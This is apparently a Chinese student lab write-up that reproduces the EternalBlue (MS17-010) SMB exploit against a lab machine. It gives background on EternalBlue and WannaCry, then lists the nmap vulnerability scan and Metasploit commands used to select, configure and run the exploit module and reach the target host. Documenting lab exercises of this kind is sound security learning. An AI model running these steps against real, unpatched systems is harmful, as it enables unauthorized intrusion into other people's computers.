提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
文章目录
前言
本次实验主要利用Linux系统自带的Metasploit实现永恒之蓝漏洞的复现,具体步骤如下:
一、永恒之蓝是什么?
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
二、实现步骤
1.sudo su
获取超级管理员权限
2.nmap --script=vuln 192.168.0.5
利用nmap扫描目标靶机是否存在永恒之蓝漏洞
发
发现ms17-010是永恒之蓝的序列号,目标靶机存在永恒之蓝漏洞
3.msfconsole
打开metasploit
4.search ms17-010
搜索永恒之蓝序列号
5.use 0
使用永恒之蓝模块
6.show options
查看配置模块
7.set rhosts 192.168.0.5
配置目标靶机ip
8.run
运行模块
9.成果
通过漏洞攻击得到的目标主机ipconfig
目标主机ipconfig
总结
通过本次实验我了解到了Linux系统里面自带了很多有用的工具,例如Metasploit,使复杂的漏洞攻击简单化。我还了解到利用Metasploit实现漏洞攻击的步骤一般为:打开模块-配置模块-运行模块。